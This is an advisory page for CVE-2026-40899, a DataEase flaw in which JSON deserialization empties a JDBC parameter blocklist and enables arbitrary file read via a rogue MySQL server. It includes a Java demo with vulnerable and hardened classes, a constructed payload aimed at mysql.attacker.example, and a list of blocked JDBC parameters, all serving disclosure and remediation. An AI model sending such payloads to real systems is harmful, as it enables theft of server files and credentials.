CVE-2026-40899
JDBC Parameter Blocklist Bypass in DataEase Enables Arbitrary File Read
Publication date: 2026-04-16
Last updated on: 2026-04-20
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dataease | dataease | to 2.10.21 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-183 | The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in DataEase, an open-source data visualization and analytics platform, specifically in versions 2.10.20 and below. It involves a JDBC parameter blocklist bypass in the MySQL datasource configuration. The Mysql class uses Lombok's @Data annotation, which automatically generates a public setter for the illegalParameters field that holds the JDBC security blocklist.
When a datasource configuration is submitted as JSON, the Jackson deserialization process calls the setIllegalParameters method with an attacker-supplied empty list. This action replaces the blocklist before the getJdbc() validation runs, effectively bypassing the security blocklist.
As a result, an authenticated attacker can include JDBC parameters that the blocklist exists to stop, such as allowLoadLocalInfile=true. With that parameter set, the MySQL JDBC client running on the DataEase server will honour a LOAD DATA LOCAL INFILE request from whatever server it connects to, and that protocol feature lets the server name a file on the client's filesystem and have its contents sent back. By pointing the datasource at a rogue MySQL server under their control, the attacker can therefore read arbitrary files that the DataEase process can access, including sensitive environment variables and database credentials.
This vulnerability was fixed in version 2.10.21.
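The setter-overwrite sequence described above, as an added example that is not DataEase's own code: a minimal Mysql-style bean in plain Java (the setter Lombok's @Data would generate is written out by hand so it compiles without Lombok), deserialized with Jackson from a constructed attacker payload, next to a hardened variant that keeps the blocklist out of reach of the JSON binder. The class and field names, the starting blocklist contents, the payload and the URL-building logic are assumptions for illustration; the hardening shown is one sensible fix, not necessarily the change shipped in 2.10.21. It assumes jackson-databind on the classpath and Java 11 or later.

```java
import java.util.ArrayList;
import java.util.List;

import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
import com.fasterxml.jackson.databind.ObjectMapper;

public class JdbcBlocklistBypassDemo {

    // Shared check: reject any key in the extra-parameter string that appears on the blocklist.
    static void rejectIllegalParams(String extraParams, List<String> blocklist) {
        if (extraParams == null || extraParams.isEmpty()) return;
        for (String kv : extraParams.split("&")) {
            String key = kv.split("=", 2)[0].trim();
            for (String bad : blocklist) {
                if (key.equalsIgnoreCase(bad)) {
                    throw new IllegalArgumentException("illegal JDBC parameter: " + key);
                }
            }
        }
    }

    /** Vulnerable shape (hypothetical stand-in for the real Mysql class). The blocklist is an
     *  ordinary instance field with a public setter, which is what Lombok's @Data generates.
     *  Jackson binds an "illegalParameters" JSON property straight into it, so the request
     *  decides what is forbidden before getJdbc() ever runs. */
    public static class VulnerableMysql {
        private String host = "127.0.0.1";
        private int port = 3306;
        private String database = "";
        private String extraParams = "";
        // Assumed starting blocklist; the real list lives in DataEase.
        private List<String> illegalParameters = new ArrayList<>(
                List.of("allowLoadLocalInfile", "allowUrlInLocalInfile", "autoDeserialize"));

        public String getHost() { return host; }
        public void setHost(String host) { this.host = host; }
        public int getPort() { return port; }
        public void setPort(int port) { this.port = port; }
        public String getDatabase() { return database; }
        public void setDatabase(String database) { this.database = database; }
        public String getExtraParams() { return extraParams; }
        public void setExtraParams(String extraParams) { this.extraParams = extraParams; }
        public List<String> getIllegalParameters() { return illegalParameters; }
        public void setIllegalParameters(List<String> illegalParameters) { // the sink
            this.illegalParameters = illegalParameters;
        }

        public String getJdbc() {
            rejectIllegalParams(extraParams, illegalParameters); // validates against a list the caller chose
            return "jdbc:mysql://" + host + ":" + port + "/" + database
                    + (extraParams.isEmpty() ? "" : "?" + extraParams);
        }
    }

    /** Hardened shape. The blocklist is a static constant no JSON property can reach, and the
     *  class ignores an "illegalParameters" key outright. Dropping the setter alone is not
     *  enough: Jackson's USE_GETTERS_AS_SETTERS (on by default) can still mutate a collection
     *  returned by a getter, so the property must not be bound at all. */
    @JsonIgnoreProperties({"illegalParameters"})
    public static class HardenedMysql {
        private static final List<String> ILLEGAL_PARAMETERS =
                List.of("allowLoadLocalInfile", "allowUrlInLocalInfile", "autoDeserialize");

        private String host = "127.0.0.1";
        private int port = 3306;
        private String database = "";
        private String extraParams = "";

        public String getHost() { return host; }
        public void setHost(String host) { this.host = host; }
        public int getPort() { return port; }
        public void setPort(int port) { this.port = port; }
        public String getDatabase() { return database; }
        public void setDatabase(String database) { this.database = database; }
        public String getExtraParams() { return extraParams; }
        public void setExtraParams(String extraParams) { this.extraParams = extraParams; }

        public String getJdbc() {
            rejectIllegalParams(extraParams, ILLEGAL_PARAMETERS);
            return "jdbc:mysql://" + host + ":" + port + "/" + database
                    + (extraParams.isEmpty() ? "" : "?" + extraParams);
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed attacker payload: points at a host the attacker controls, asks for
        // allowLoadLocalInfile=true, and empties the blocklist in the same request.
        String payload = "{\"host\":\"mysql.attacker.example\",\"port\":3306,\"database\":\"x\","
                + "\"extraParams\":\"allowLoadLocalInfile=true\",\"illegalParameters\":[]}";
        ObjectMapper mapper = new ObjectMapper();

        VulnerableMysql v = mapper.readValue(payload, VulnerableMysql.class);
        System.out.println("vulnerable getJdbc(): " + v.getJdbc()); // no exception: the list is now empty

        HardenedMysql h = mapper.readValue(payload, HardenedMysql.class);
        try {
            h.getJdbc();
        } catch (IllegalArgumentException e) {
            System.out.println("hardened getJdbc(): " + e.getMessage()); // rejects allowLoadLocalInfile
        }
    }
}
```

The point to take from the two classes is that the validation code is identical; the only difference is whether the deserializer can reach the list the validator trusts. When reviewing similar beans, look for any security-relevant field (blocklists, allowlists, role flags) that lives on the same object the request is bound into, and either move it to a constant or exclude it from binding explicitly.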
How can this vulnerability impact me?
This vulnerability can have serious impacts if exploited. An authenticated attacker can bypass the JDBC parameter blocklist and enable dangerous parameters like allowLoadLocalInfile=true.
By exploiting the LOAD DATA LOCAL INFILE protocol feature, the attacker can read arbitrary files from the DataEase server's filesystem. This includes sensitive information such as environment variables and database credentials.
Such unauthorized access to sensitive files can lead to data breaches, compromise of server integrity, and further exploitation of the system.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, you should upgrade DataEase to version 2.10.21 or later, where the issue has been fixed.
Additionally, restrict authenticated users from modifying datasource configurations or submitting JSON that could alter the JDBC parameter blocklist.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability allows an authenticated attacker to bypass JDBC parameter blocklists and read arbitrary files from the server filesystem, including sensitive environment variables and database credentials.
This exposure of sensitive data could lead to non-compliance with data protection regulations such as GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access.
Therefore, exploitation of this vulnerability may result in violations of these standards due to potential unauthorized disclosure of protected data.